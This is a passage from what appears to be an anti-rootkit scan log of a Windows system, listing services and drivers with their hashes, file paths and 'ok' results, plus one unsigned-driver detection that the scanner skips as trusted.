09:35:39.0390 0x0ff0  RDPREFMP - ok
09:35:39.0459 0x0ff0  [ 70CBA1A0C98600A2AA1863479B35CB90, 91A133297921B4955817176251AFC5283DA3C7D2099700C4C92ECC94DBE9A99E ] RdpVideoMiniport C:\Windows\system32\drivers\rdpvideominiport.sys
09:35:39.0475 0x0ff0  RdpVideoMiniport - ok
09:35:39.0524 0x0ff0  [ FE571E088C2D83619D2D48D4E961BF41, 88C5A2FCB1D0E528657842E39963471A6E42FCA3FCDF37955AEC8258AB4C48EA ] RDPWD           C:\Windows\system32\drivers\RDPWD.sys
09:35:39.0543 0x0ff0  RDPWD - ok
09:35:39.0557 0x0ff0  [ 34ED295FA0121C241BFEF24764FC4520, AAEE5F00CAA763A5BA51CF56BD7262C03409CD72BD5601490E3EC3FFF929BB5F ] rdyboost        C:\Windows\system32\drivers\rdyboost.sys
09:35:39.0569 0x0ff0  rdyboost - ok
09:35:39.0585 0x0ff0  [ 254FB7A22D74E5511C73A3F6D802F192, 3D0FB5840364200DE394F8CC28DA0E334C2B5FA8FF28A41656EE72287F3D3836 ] RemoteAccess    C:\Windows\System32\mprdim.dll
09:35:39.0616 0x0ff0  RemoteAccess - ok
09:35:39.0631 0x0ff0  [ E4D94F24081440B5FC5AA556C7C62702, 147CAA03568DC480F9506E30B84891AB7E433B5EBC05F34FF10F72B00E1C6B22 ] RemoteRegistry  C:\Windows\system32\regsvc.dll
09:35:39.0663 0x0ff0  RemoteRegistry - ok
09:35:39.0701 0x0ff0  [ E4DC58CF7B3EA515AE917FF0D402A7BB, 665B5CD9FE905B0EE3F59A7B1A94760F5393EBEE729877D8584349754C2867E8 ] RpcEptMapper    C:\Windows\System32\RpcEpMap.dll
09:35:39.0731 0x0ff0  RpcEptMapper - ok
09:35:39.0740 0x0ff0  [ D5BA242D4CF8E384DB90E6A8ED850B8C, CB4CB2608B5E31B55FB1A2CF4051E6D08A0C2A5FB231B2116F95938D7577334E ] RpcLocator      C:\Windows\system32\locator.exe
09:35:39.0769 0x0ff0  RpcLocator - ok
09:35:39.0797 0x0ff0  [ 5C627D1B1138676C0A7AB2C2C190D123, C5003F2C912C5CA990E634818D3B4FD72F871900AF2948BD6C4D6400B354B401 ] RpcSs           C:\Windows\system32\rpcss.dll
09:35:39.0826 0x0ff0  RpcSs - ok
09:35:39.0847 0x0ff0  [ DDC86E4F8E7456261E637E3552E804FF, D250C69CCC75F2D88E7E624FCC51300E75637333317D53908CCA7E0F117173DD ] rspndr          C:\Windows\system32\DRIVERS\rspndr.sys
09:35:39.0869 0x0ff0  rspndr - ok
09:35:39.0952 0x0ff0  [ C2A49525F6CEEED97A1D9FC950AAF863, DAA57C1C446861C733D3BE668EB247E40CE3871EF8FA0BB91CEB074B7357E0D8 ] rzudd           C:\Windows\system32\DRIVERS\rzudd.sys
09:35:39.0985 0x0ff0  rzudd - ok
09:35:40.0012 0x0ff0  [ E60C0A09F997826C7627B244195AB581, E8630ED74B38B98BF584E353D992C1311BC36AB7F20A1BB66C9CD65CE1E46F8D ] s3cap           C:\Windows\system32\drivers\vms3cap.sys
09:35:40.0027 0x0ff0  s3cap - ok
09:35:40.0046 0x0ff0  [ 204F3F58212B3E422C90BD9691A2DF28, D748A8CEE4D59B4248C9B1ACA5155D0FF6635A29564B4391B7FAC6261F93FE99 ] SamSs           C:\Windows\system32\lsass.exe
09:35:40.0055 0x0ff0  SamSs - ok
09:35:40.0067 0x0ff0  [ AC03AF3329579FFFB455AA2DAABBE22B, 7AD3B62ADFEC166F9E256F9FF8BAA0568B2ED7308142BF8F5269E6EAA5E0A656 ] sbp2port        C:\Windows\system32\drivers\sbp2port.sys
09:35:40.0077 0x0ff0  sbp2port - ok
09:35:40.0089 0x0ff0  [ 9B7395789E3791A3B6D000FE6F8B131E, E5F067F3F212BF5481668BE1779CBEF053F511F8967589BE2E865ACB9A620024 ] SCardSvr        C:\Windows\System32\SCardSvr.dll
09:35:40.0114 0x0ff0  SCardSvr - ok
09:35:40.0122 0x0ff0  [ 253F38D0D7074C02FF8DEB9836C97D2B, CB5CAFCB8628BB22877F74ACF1DED0BBAED8F4573A74DA7FE94BBBA584889116 ] scfilter        C:\Windows\system32\DRIVERS\scfilter.sys
09:35:40.0151 0x0ff0  scfilter - ok
09:35:40.0195 0x0ff0  [ 262F6592C3299C005FD6BEC90FC4463A, 54095E37F0B6CC677A3E9BDD40F4647C713273D197DB341063AA7F342A60C4A7 ] Schedule        C:\Windows\system32\schedsvc.dll
09:35:40.0244 0x0ff0  Schedule - ok
09:35:40.0260 0x0ff0  [ F17D1D393BBC69C5322FBFAFACA28C7F, 62A1A92B3C52ADFD0B808D7F69DD50238B5F202421F1786F7EAEAA63F274B3E8 ] SCPolicySvc     C:\Windows\System32\certprop.dll
09:35:40.0281 0x0ff0  SCPolicySvc - ok
09:35:40.0359 0x0ff0  [ 6EA4234DC55346E0709560FE7C2C1972, 64011E044C16E2F92689E5F7E4666A075E27BBFA61F3264E5D51CE1656C1D5B8 ] SDRSVC          C:\Windows\System32\SDRSVC.dll
09:35:40.0400 0x0ff0  SDRSVC - ok
09:35:40.0466 0x0ff0  [ 331E7BDE228914574FC9AE6CD520DAFA, 15C6364E73328E86E431DA0960DEE794F96A6E83FF82C9CA181E70127E395311 ] SeaPort         C:\Program Files (x86)\Microsoft\Search Enhancement Pack\SeaPort\SeaPort.exe
09:35:40.0479 0x0ff0  SeaPort - ok
09:35:40.0498 0x0ff0  [ 3EA8A16169C26AFBEB544E0E48421186, 34BBB0459C96B3DE94CCB0D73461562935C583D7BF93828DA4E20A6BC9B7301D ] secdrv          C:\Windows\system32\drivers\secdrv.sys
09:35:40.0525 0x0ff0  secdrv - ok
09:35:40.0539 0x0ff0  [ BC617A4E1B4FA8DF523A061739A0BD87, 10C4057F6B321EB5237FF619747B74F5401BC17D15A8C7060829E8204A2297F9 ] seclogon        C:\Windows\system32\seclogon.dll
09:35:40.0561 0x0ff0  seclogon - ok
09:35:40.0568 0x0ff0  [ C32AB8FA018EF34C0F113BD501436D21, E0EB8E80B51E45CA7EB061E705DA0BC07878759418A8519AE6E12326FE79E7C7 ] SENS            C:\Windows\System32\sens.dll
09:35:40.0596 0x0ff0  SENS - ok
09:35:40.0599 0x0ff0  [ 0336CFFAFAAB87A11541F1CF1594B2B2, 8B8A6A33E78A12FB05E29B2E2775850626574AFD2EF88748D65E690A07B10B8D ] SensrSvc        C:\Windows\system32\sensrsvc.dll
09:35:40.0608 0x0ff0  SensrSvc - ok
09:35:40.0623 0x0ff0  [ CB624C0035412AF0DEBEC78C41F5CA1B, A4D937F11E06CAE914347CA1362F4C98EC5EE0C0C80321E360EA1ABD6726F8D4 ] Serenum         C:\Windows\system32\drivers\serenum.sys
09:35:40.0637 0x0ff0  Serenum - ok
09:35:40.0661 0x0ff0  [ C1D8E28B2C2ADFAEC4BA89E9FDA69BD6, 8F9776FB84C5D11068EAF1FF1D1A46466C655D64D256A8B1E31DC0C23B5DD22D ] Serial          C:\Windows\system32\drivers\serial.sys
09:35:40.0679 0x0ff0  Serial - ok
09:35:40.0690 0x0ff0  [ 1C545A7D0691CC4A027396535691C3E3, 065C30BE598FF4DC55C37E0BBE0CEDF10A370AE2BF5404B42EBBB867A3FFED6D ] sermouse        C:\Windows\system32\drivers\sermouse.sys
09:35:40.0726 0x0ff0  sermouse - ok
09:35:40.0740 0x0ff0  [ 0B6231BF38174A1628C4AC812CC75804, E569BF1F7F5689E2E917FA6516DB53388A5B8B1C6699DEE030147E853218811D ] SessionEnv      C:\Windows\system32\sessenv.dll
09:35:40.0776 0x0ff0  SessionEnv - ok
09:35:40.0780 0x0ff0  [ A554811BCD09279536440C964AE35BBF, DA8F893722F803E189D7D4D6C6232ED34505B63A64ED3A0132A5BB7A2BABDE55 ] sffdisk         C:\Windows\system32\drivers\sffdisk.sys
09:35:40.0791 0x0ff0  sffdisk - ok
09:35:40.0800 0x0ff0  [ FF414F0BAEFEBA59BC6C04B3DB0B87BF, B81EF5D26AEB572CAB590F7AD7CA8C89F296420089EF5E6148E972F2DBCA1042 ] sffp_mmc        C:\Windows\system32\drivers\sffp_mmc.sys
09:35:40.0811 0x0ff0  sffp_mmc - ok
09:35:40.0816 0x0ff0  [ DD85B78243A19B59F0637DCF284DA63C, 6730D4F2BAE7E24615746ACC41B42D01DB6068D6504982008ADA1890DE900197 ] sffp_sd         C:\Windows\system32\drivers\sffp_sd.sys
09:35:40.0833 0x0ff0  sffp_sd - ok
09:35:40.0844 0x0ff0  [ A9D601643A1647211A1EE2EC4E433FF4, 7AC60B4AB48D4BBF1F9681C12EC2A75C72E6E12D30FABC564A24394310E9A5F9 ] sfloppy         C:\Windows\system32\drivers\sfloppy.sys
09:35:40.0853 0x0ff0  sfloppy - ok
09:35:40.0881 0x0ff0  [ B95F6501A2F8B2E78C697FEC401970CE, 758B73A32902299A313348CE7EC189B20EB4CB398D0180E4EE24B84DAD55F291 ] SharedAccess    C:\Windows\System32\ipnathlp.dll
09:35:40.0913 0x0ff0  SharedAccess - ok
09:35:40.0941 0x0ff0  [ AAF932B4011D14052955D4B212A4DA8D, 2A3BFD0FA9569288E91AE3E72CA1EC39E1450D01E6473CE51157E0F138257923 ] ShellHWDetection C:\Windows\System32\shsvcs.dll
09:35:40.0970 0x0ff0  ShellHWDetection - ok
09:35:40.0984 0x0ff0  [ 843CAF1E5FDE1FFD5FF768F23A51E2E1, 89CA9F516E42A6B905474D738CDA2C121020A07DBD4E66CFE569DD77D79D7820 ] SiSRaid2        C:\Windows\system32\drivers\SiSRaid2.sys
09:35:40.0993 0x0ff0  SiSRaid2 - ok
09:35:41.0000 0x0ff0  [ 6A6C106D42E9FFFF8B9FCB4F754F6DA4, 87B85C66DF7EB6FDB8A2341D05FAA5261FF68A90CCFC63F0E4A03824F1E33E5E ] SiSRaid4        C:\Windows\system32\drivers\sisraid4.sys
09:35:41.0010 0x0ff0  SiSRaid4 - ok
09:35:41.0120 0x0ff0  [ E6035ADBA3F13ACF1BEDA7B5D50FDBBB, A840D072395F2394E3B55A080F8F17CC3A02E8BCAFE8B8EC0374ECA1EFF05C23 ] SkypeUpdate     C:\Program Files (x86)\Skype\Updater\Updater.exe
09:35:41.0162 0x0ff0  SkypeUpdate - ok
09:35:41.0180 0x0ff0  [ 548260A7B8654E024DC30BF8A7C5BAA4, 4A7E58331D7765A12F53DC2371739DC9A463940B13E16157CE10DB80E958D740 ] Smb             C:\Windows\system32\DRIVERS\smb.sys
09:35:41.0203 0x0ff0  Smb - ok
09:35:41.0242 0x0ff0  [ 6313F223E817CC09AA41811DAA7F541D, D787061043BEEDB9386B048CB9E680E6A88A1CBAE9BD4A8C0209155BFB76C630 ] SNMPTRAP        C:\Windows\System32\snmptrap.exe
09:35:41.0261 0x0ff0  SNMPTRAP - ok
09:35:41.0274 0x0ff0  [ B9E31E5CACDFE584F34F730A677803F9, 21A5130BD00089C609522A372018A719F8E37103D2DD22C59EACB393BE35A063 ] spldr           C:\Windows\system32\drivers\spldr.sys
09:35:41.0282 0x0ff0  spldr - ok
09:35:41.0310 0x0ff0  [ 85DAA09A98C9286D4EA2BA8D0E644377, F9C324E2EF81193FE831C7EECC44A100CA06F82FA731BF555D9EA4D91DA13329 ] Spooler         C:\Windows\System32\spoolsv.exe
09:35:41.0331 0x0ff0  Spooler - ok
09:35:41.0520 0x0ff0  [ E17E0188BB90FAE42D83E98707EFA59C, FC075F7B39E86CC8EF6DA4E339FE946917E319C347AC70FB0C50AAF36F97E27F ] sppsvc          C:\Windows\system32\sppsvc.exe
09:35:41.0660 0x0ff0  sppsvc - ok
09:35:41.0680 0x0ff0  [ 93D7D61317F3D4BC4F4E9F8A96A7DE45, 36D48B23B8243BE5229707375FCD11C2DCAC96983199345365F065A0CBF33314 ] sppuinotify     C:\Windows\system32\sppuinotify.dll
09:35:41.0703 0x0ff0  sppuinotify - ok
09:35:41.0740 0x0ff0  [ 441FBA48BFF01FDB9D5969EBC1838F0B, 306128F1AD489F87161A089D1BDC1542A4CB742D91A0C12A7CD1863FDB8932C0 ] srv             C:\Windows\system32\DRIVERS\srv.sys
09:35:41.0777 0x0ff0  srv - ok
09:35:41.0791 0x0ff0  [ B4ADEBBF5E3677CCE9651E0F01F7CC28, 726DB2283113AB2A9681E8E9F61132303D6D86E9CD034C40EE4A8C9DB29E87F7 ] srv2            C:\Windows\system32\DRIVERS\srv2.sys
09:35:41.0819 0x0ff0  srv2 - ok
09:35:41.0835 0x0ff0  [ 27E461F0BE5BFF5FC737328F749538C3, AFA4704ED8FFC1A0BAB40DFB81D3AE3F3D933A3C9BF54DDAF39FF9AF3646D9E6 ] srvnet          C:\Windows\system32\DRIVERS\srvnet.sys
09:35:41.0847 0x0ff0  srvnet - ok
09:35:41.0872 0x0ff0  [ 51B52FBD583CDE8AA9BA62B8B4298F33, 2E2403F8AA39E79D1281CA006B51B43139C32A5FDD64BD34DAA4B935338BD740 ] SSDPSRV         C:\Windows\System32\ssdpsrv.dll
09:35:41.0907 0x0ff0  SSDPSRV - ok
09:35:41.0920 0x0ff0  [ AB7AEBF58DAD8DAAB7A6C45E6A8885CB, D21CDBC4C2AA0DB5B4455D5108B0CAF4282A2E664B9035708F212CC094569D9D ] SstpSvc         C:\Windows\system32\sstpsvc.dll
09:35:41.0943 0x0ff0  SstpSvc - ok
09:35:42.0046 0x0ff0  [ 0A3544D7E9AF7D8C991C904339157EDC, 1E1DE4D808AE1174B0CB37E93EBADFC98FEBCD70D612CFE393DDA513581CD123 ] Steam Client Service C:\Program Files (x86)\Common Files\Steam\SteamService.exe
09:35:42.0318 0x0ff0  Steam Client Service - ok
09:35:42.0488 0x0ff0  [ 89123DFAC7E1E6E664D19622D135571B, 6870050EA5B4C0E9091C87FC42767BAD84E726FEC43DB989CE35650ABF9ED09E ] Stereo Service  C:\Program Files (x86)\NVIDIA Corporation\3D Vision\nvSCPAPISvr.exe
09:35:43.0826 0x0ff0  Stereo Service - ok
09:35:43.0847 0x0ff0  [ F3817967ED533D08327DC73BC4D5542A, 1B204454408A690C0A86447F3E4AA9E7C58A9CFB567C94C17C21920BA648B4D5 ] stexstor        C:\Windows\system32\drivers\stexstor.sys
09:35:43.0857 0x0ff0  stexstor - ok
09:35:43.0917 0x0ff0  [ 8DD52E8E6128F4B2DA92CE27402871C1, 1101C38BE8FC383B5F2F9FA402F9652B23B88A764DE2B584DFE62B88B11DEF92 ] stisvc          C:\Windows\System32\wiaservc.dll
09:35:43.0940 0x0ff0  stisvc - ok
09:35:43.0962 0x0ff0  [ 7785DC213270D2FC066538DAF94087E7, F09CB2895241719CA5147B2EE9F7ECBD0303AFFB5CD896F06D4D29BAAAFC207B ] storflt         C:\Windows\system32\drivers\vmstorfl.sys
09:35:43.0970 0x0ff0  storflt - ok
09:35:43.0991 0x0ff0  [ D34E4943D5AC096C8EDEEBFD80D76E23, 1DD7F6F97060B5F763A04ACA1F75E59DAB09EF824FD09B83FC3C192837D006DE ] storvsc         C:\Windows\system32\drivers\storvsc.sys
09:35:43.0999 0x0ff0  storvsc - ok
09:35:44.0008 0x0ff0  [ D01EC09B6711A5F8E7E6564A4D0FBC90, 3CB922291DBADC92B46B9E28CCB6810CD8CCDA3E74518EC9522B58B998E1F969 ] swenum          C:\Windows\system32\DRIVERS\swenum.sys
09:35:44.0016 0x0ff0  swenum - ok
09:35:44.0044 0x0ff0  [ E08E46FDD841B7184194011CA1955A0B, 9C3725BB1F08F92744C980A22ED5C874007D3B5863C7E1F140F50061052AC418 ] swprv           C:\Windows\System32\swprv.dll
09:35:44.0087 0x0ff0  swprv - ok
09:35:44.0096 0x0ff0  [ C3A39C4079305480972D29C44B868C78, 8F1BB75C743256F905EAEDE744B6082C53774C49126875FB4E4FBA30F5478B17 ] Synth3dVsc      C:\Windows\system32\drivers\synth3dvsc.sys
09:35:44.0105 0x0ff0  Synth3dVsc - ok
09:35:44.0149 0x0ff0  [ BF9CCC0BF39B418C8D0AE8B05CF95B7D, 3C13217548BE61F2BDB8BD41F77345CDDA1F97BF0AE17241C335B9807EB3DBB8 ] SysMain         C:\Windows\system32\sysmain.dll
09:35:44.0219 0x0ff0  SysMain - ok
09:35:44.0229 0x0ff0  [ E3C61FD7B7C2557E1F1B0B4CEC713585, 01F0E116606D185BF93B540868075BFB1A398197F6AABD994983DBFF56B3A8A0 ] TabletInputService C:\Windows\System32\TabSvc.dll
09:35:44.0243 0x0ff0  TabletInputService - ok
09:35:44.0257 0x0ff0  [ 40F0849F65D13EE87B9A9AE3C1DD6823, E251A7EF3D0FD2973AF33A62FC457A7E8D5E8694208F811F52455F7C2426121F ] TapiSrv         C:\Windows\System32\tapisrv.dll
09:35:44.0296 0x0ff0  TapiSrv - ok
09:35:44.0306 0x0ff0  [ 1BE03AC720F4D302EA01D40F588162F6, AB644862BF1D2E824FD846180DEC4E2C0FAFCC517451486DE5A92E5E78A952E4 ] TBS             C:\Windows\System32\tbssvc.dll
09:35:44.0328 0x0ff0  TBS - ok
09:35:44.0394 0x0ff0  [ 04ADD18EE5CC9FBEDAEC1DD1CD0CB45E, F05C0C4CA3DD234AD5D60CF1EF763C9A1D9EC3C157E180C2D75CC07E6B02A611 ] Tcpip           C:\Windows\system32\drivers\tcpip.sys
09:35:44.0448 0x0ff0  Tcpip - ok
09:35:44.0502 0x0ff0  [ 04ADD18EE5CC9FBEDAEC1DD1CD0CB45E, F05C0C4CA3DD234AD5D60CF1EF763C9A1D9EC3C157E180C2D75CC07E6B02A611 ] TCPIP6          C:\Windows\system32\DRIVERS\tcpip.sys
09:35:44.0537 0x0ff0  TCPIP6 - ok
09:35:44.0553 0x0ff0  [ 1B16D0BD9841794A6E0CDE0CEF744ABC, 7EB8BA97339199EEE7F2B09DA2DA6279DA64A510D4598D42CF86415D67CD674C ] tcpipreg        C:\Windows\system32\drivers\tcpipreg.sys
09:35:44.0562 0x0ff0  tcpipreg - ok
09:35:44.0575 0x0ff0  [ 3371D21011695B16333A3934340C4E7C, 7416F9BBFC1BA9D875EA7D1C7A0D912FC6977B49A865D67E3F9C4E18A965082D ] TDPIPE          C:\Windows\system32\drivers\tdpipe.sys
09:35:44.0592 0x0ff0  TDPIPE - ok
09:35:44.0609 0x0ff0  [ 51C5ECEB1CDEE2468A1748BE550CFBC8, 4E8F83877330B421F7B5D8393D34BC44C6450E69209DAA95B29CB298166A5DF9 ] TDTCP           C:\Windows\system32\drivers\tdtcp.sys
09:35:44.0618 0x0ff0  TDTCP - ok
09:35:44.0661 0x0ff0  [ 70988118145F5F10EF24720B97F35F65, F80C806417A68047FFB3D63214BC4AE5445315219AC594E043293006B704A63D ] tdx             C:\Windows\system32\DRIVERS\tdx.sys
09:35:44.0692 0x0ff0  tdx - ok
09:35:44.0699 0x0ff0  [ 561E7E1F06895D78DE991E01DD0FB6E5, 83BFA50A528762EC52A011302AC3874636FB7E26628CD7ACFBF2BDC9FAA8110D ] TermDD          C:\Windows\system32\DRIVERS\termdd.sys
09:35:44.0707 0x0ff0  TermDD - ok
09:35:44.0715 0x0ff0  [ 2B5BDFF688EC9871D7EC5837833374E9, BD6C629FA2938987ABF95B790B20F0B7D4D023D5013E575F343A802D6213074E ] terminpt        C:\Windows\system32\drivers\terminpt.sys
09:35:44.0725 0x0ff0  terminpt - ok
09:35:44.0786 0x0ff0  [ 008CD4EBFABCF78D0F19B3778492648C, 9050490EEE0AD86E73F0A82D83E4FC29DF84F6B6FDB389AE135FD712B5F425BE ] TermService     C:\Windows\System32\termsrv.dll
09:35:44.0810 0x0ff0  TermService - ok
09:35:44.0819 0x0ff0  [ F0344071948D1A1FA732231785A0664C, DB9886C2C858FAF45AEA15F8E42860343F73EB8685C53EC2E8CCC10586CB0832 ] Themes          C:\Windows\system32\themeservice.dll
09:35:44.0832 0x0ff0  Themes - ok
09:35:44.0857 0x0ff0  [ E40E80D0304A73E8D269F7141D77250B, 0DB4AC13A264F19A84DC0BCED54E8E404014CC09C993B172002B1561EC7E265A ] THREADORDER     C:\Windows\system32\mmcss.dll
09:35:44.0878 0x0ff0  THREADORDER - ok
09:35:44.0933 0x0ff0  [ E00020EC5196A532248D514262C7C7D3, FB1B8E4603D8835D6369228085DC6C03F2540D4BD0B7B8B347730F29D4C7F3EE ] TRIDCap         C:\Windows\system32\DRIVERS\AVerTM62_x64.sys
09:35:44.0981 0x0ff0  TRIDCap - detected UnsignedFile.Multi.Generic ( 1 )
09:35:50.0753 0x0ff0  Detect skipped due to KSN trusted
09:35:50.0753 0x0ff0  TRIDCap - ok
09:35:50.0776 0x0ff0  [ 7E7AFD841694F6AC397E99D75CEAD49D, DE87F203FD8E6BDCCFCA1860A85F283301A365846FB703D9BB86278D8AC96B07 ] TrkWks          C:\Windows\System32\trkwks.dll
09:35:50.0812 0x0ff0  TrkWks - ok
09:35:50.0838 0x0ff0  [ 773212B2AAA24C1E31F10246B15B276C, F2EF85F5ABA307976D9C649D710B408952089458DDE97D4DEF321DF14E46A046 ] TrustedInstaller C:\Windows\servicing\TrustedInstaller.exe
09:35:50.0863 0x0ff0  TrustedInstaller - ok
09:35:50.0899 0x0ff0  [ E232A3B43A894BB327FC161529BD9ED1, F2673DA8C920F21ACCECC25F7C59A05822E5E577D47F126EDF9C94FEB4B30C5F ] tssecsrv        C:\Windows\system32\DRIVERS\tssecsrv.sys
09:35:50.0912 0x0ff0  tssecsrv - ok
09:35:50.0946 0x0ff0  [ E9981ECE8D894CEF7038FD1D040EB426, DCDDCE933CAECE8180A3447199B07F2F0413704EEC1A09606EE357901A84A7CF ] TsUsbFlt        C:\Windows\system32\drivers\tsusbflt.sys
09:35:50.0970 0x0ff0  TsUsbFlt - ok
09:35:50.0994 0x0ff0  [ 9CC2CCAE8A84820EAECB886D477CBCB8, 50D8AA2D7477A6618A0C31BB4D1C4887B457865FB1105E2E7B984EEFA337B804 ] TsUsbGD         C:\Windows\system32\drivers\TsUsbGD.sys
09:35:51.0014 0x0ff0  TsUsbGD - ok
09:35:51.0030 0x0ff0  [ E1748D04AE40118B62BC18AC86032192, A954B141D1B27272C771D14F3B40C7CC1F572DD72559F2C96182EFBE2B095FDE ] tsusbhub        C:\Windows\system32\drivers\tsusbhub.sys
09:35:51.0040 0x0ff0  tsusbhub - ok
09:35:51.0062 0x0ff0  [ 3566A8DAAFA27AF944F5D705EAA64894, AE9D8B648DA08AF667B9456C3FE315489859C157510A258559F18238F2CC92B8 ] tunnel          C:\Windows\system32\DRIVERS\tunnel.sys
09:35:51.0095 0x0ff0  tunnel - ok
09:35:51.0134 0x0ff0  [ B4DD609BD7E282BFC683CEC7EAAAAD67, EF131DB6F6411CAD36A989A421AF93F89DD61601AC524D2FF11C10FF6E3E9123 ] uagp35          C:\Windows\system32\drivers\uagp35.sys
09:35:51.0144 0x0ff0  uagp35 - ok
09:35:51.0165 0x0ff0  [ FF4232A1A64012BAA1FD97C7B67DF593, D8591B4EB056899C7B604E4DD852D82D4D9809F508ABCED4A03E1BE6D5D456E3 ] udfs            C:\Windows\system32\DRIVERS\udfs.sys
09:35:51.0206 0x0ff0  udfs - ok
09:35:51.0222 0x0ff0  [ 3CBDEC8D06B9968ABA702EBA076364A1, B8DAB8AA804FC23021BFEBD7AE4D40FBE648D6C6BA21CC008E26D1C084972F9B ] UI0Detect       C:\Windows\system32\UI0Detect.exe
09:35:51.0237 0x0ff0  UI0Detect - ok
09:35:51.0257 0x0ff0  [ 4BFE1BC28391222894CBF1E7D0E42320, 5918B1ED2030600DF77BDACF1C808DF6EADDD8BF3E7003AF1D72050D8B102B3A ] uliagpkx        C:\Windows\system32\drivers\uliagpkx.sys
09:35:51.0266 0x0ff0  uliagpkx - ok
09:35:51.0284 0x0ff0  [ DC54A574663A895C8763AF0FA1FF7561, 09A3F3597E91CBEB2F38E96E75134312B60CAE5574B2AD4606C2D3E992AEDDFE ] umbus           C:\Windows\system32\DRIVERS\umbus.sys
09:35:51.0303 0x0ff0  umbus - ok
09:35:51.0319 0x0ff0  [ B2E8E8CB557B156DA5493BBDDCC1474D, F547509A08C0679ACB843E20C9C0CF51BED1B06530BBC529DFB0944504564A43 ] UmPass          C:\Windows\system32\drivers\umpass.sys
09:35:51.0327 0x0ff0  UmPass - ok
09:35:51.0344 0x0ff0  [ A293DCD756D04D8492A750D03B9A297C, 203600ED0B7F8BA4C6D6F4ED810F4DF5AB70928B06EC4131C5D8ADF628444ED1 ] UmRdpService    C:\Windows\System32\umrdp.dll
09:35:51.0358 0x0ff0  UmRdpService - ok
09:35:51.0376 0x0ff0  [ D47EC6A8E81633DD18D2436B19BAF6DE, 0FB461E2D5E0B75BB5958F6362F4880BFA4C36AD930542609BCAF574941AA7AE ] upnphost        C:\Windows\System32\upnphost.dll
09:35:51.0412 0x0ff0  upnphost - ok
09:35:51.0468 0x0ff0  [ B0435098C81D04CAFFF80DDB746CD3A2, A17B207740382E38729571F0B0BC98FF874E856A7C7CE9EB930328A2AD88F52A ] usbaudio        C:\Windows\system32\drivers\usbaudio.sys
09:35:51.0498 0x0ff0  usbaudio - ok
09:35:51.0541 0x0ff0  [ DCA68B0943D6FA415F0C56C92158A83A, BEE5A5B33B22D1DF50B884D46D89FC3B8286EB16E38AD5A20F0A49E5C6766C57 ] usbccgp         C:\Windows\system32\DRIVERS\usbccgp.sys
09:35:51.0605 0x0ff0  usbccgp - ok
09:35:51.0653 0x0ff0  [ 80B0F7D5CCF86CEB5D402EAAF61FEC31, 140C62116A425DEAD25FE8D82DE283BC92C482A9F643658D512F9F67061F28AD ] usbcir          C:\Windows\system32\drivers\usbcir.sys
09:35:51.0670 0x0ff0  usbcir - ok
09:35:51.0707 0x0ff0  [ 18A85013A3E0F7E1755365D287443965, 811C5EDF38C765BCF71BCE25CB6626FF6988C3699F5EF1846240EA0052F34C33 ] usbehci         C:\Windows\system32\DRIVERS\usbehci.sys
09:35:51.0717 0x0ff0  usbehci - ok
09:35:51.0734 0x0ff0  [ 8D1196CFBB223621F2C67D45710F25BA, B5D7AFE51833B24FC9576F3AED3D8A2B290E5846060E73F9FFFAC1890A8B6003 ] usbhub          C:\Windows\system32\DRIVERS\usbhub.sys
09:35:51.0750 0x0ff0  usbhub - ok
09:35:51.0762 0x0ff0  [ 765A92D428A8DB88B960DA5A8D6089DC, 56DE8A2ED58E53B202C399CA7BACB1551136303C2EE0AB426BDBBF880E3C542C ] usbohci         C:\Windows\system32\drivers\usbohci.sys
09:35:51.0771 0x0ff0  usbohci - ok
09:35:51.0785 0x0ff0  [ 73188F58FB384E75C4063D29413CEE3D, B485463933306036B1D490722CB1674DC85670753D79FA0EF7EBCA7BBAAD9F7C ] usbprint        C:\Windows\system32\DRIVERS\usbprint.sys
09:35:51.0807 0x0ff0  usbprint - ok
09:35:51.0831 0x0ff0  [ 9661DA76B4531B2DA272ECCE25A8AF24, FEA93254A21E71A7EB8AD35FCCAD2C1E41F7329EC33B1734F5B41307A34D8637 ] usbscan         C:\Windows\system32\drivers\usbscan.sys
09:35:51.0850 0x0ff0  usbscan - ok
09:35:51.0866 0x0ff0  [ FED648B01349A3C8395A5169DB5FB7D6, DC4D7594C24ADD076927B9347F1B50B91CF03A4ABDB284248D5711D9C19DEB96 ] USBSTOR         C:\Windows\system32\DRIVERS\USBSTOR.SYS
09:35:51.0881 0x0ff0  USBSTOR - ok
09:35:51.0888 0x0ff0  [ DD253AFC3BC6CBA412342DE60C3647F3, 146F8613F1057AC054DC3593E84BC52899DA27EA33B0E72ACFB78C3699ADCDE7 ] usbuhci         C:\Windows\system32\DRIVERS\usbuhci.sys
09:35:51.0904 0x0ff0  usbuhci - ok
09:35:51.0933 0x0ff0  [ 1F775DA4CF1A3A1834207E975A72E9D7, 6D3DE5BD3EF3A76E997E5BAF900C51D25308F5A9682D1F62017F577A24095B90 ] usbvideo        C:\Windows\System32\Drivers\usbvideo.sys
09:35:51.0956 0x0ff0  usbvideo - ok
09:35:51.0972 0x0ff0  [ EDBB23CBCF2CDF727D64FF9B51A6070E, 7202484C8E1BFB2AFD64D8C81668F3EDE0E3BF5EB27572877A0A7B337AE5AE42 ] UxSms           C:\Windows\System32\uxsms.dll
09:35:51.0995 0x0ff0  UxSms - ok
09:35:52.0041 0x0ff0  [ 204F3F58212B3E422C90BD9691A2DF28, D748A8CEE4D59B4248C9B1ACA5155D0FF6635A29564B4391B7FAC6261F93FE99 ] VaultSvc        C:\Windows\system32\lsass.exe
09:35:52.0050 0x0ff0  VaultSvc - ok
09:35:52.0059 0x19b8  Object required for P2P: [ DF2213CF2DD81B790B85541D138D93C7 ] nvlddmkm
09:35:52.0060 0x0ff0  [ C5C876CCFC083FF3B128F933823E87BD, 6FE0FBB6C3207E09300E0789E2168F76668D87C317FE9F263E733827ADCFBE0D ] vdrvroot        C:\Windows\system32\drivers\vdrvroot.sys
09:35:52.0068 0x0ff0  vdrvroot - ok
09:35:52.0086 0x0ff0  [ 8D6B481601D01A456E75C3210F1830BE, A2CEF483F4231367138EEF7E67FD5BE5364FC0780C44CA1368E36CE4AA3D0633 ] vds             C:\Windows\System32\vds.exe
09:35:52.0118 0x0ff0  vds - ok
09:35:52.0130 0x0ff0  [ DA4DA3F5E02943C2DC8C6ED875DE68DD, EDE604536DB78C512D68C92B26DA77C8811AC109D1F0A473673F0A82D15A2838 ] vga             C:\Windows\system32\DRIVERS\vgapnp.sys
09:35:52.0145 0x0ff0  vga - ok
09:35:52.0157 0x0ff0  [ 53E92A310193CB3C03BEA963DE7D9CFC, 45898604375B42EB1246C17A22D91C2440F11C746FF6459AD38027C1BC2E3125 ] VgaSave         C:\Windows\System32\drivers\vga.sys
09:35:52.0184 0x0ff0  VgaSave - ok
09:35:52.0185 0x0ff0  VGPU - ok
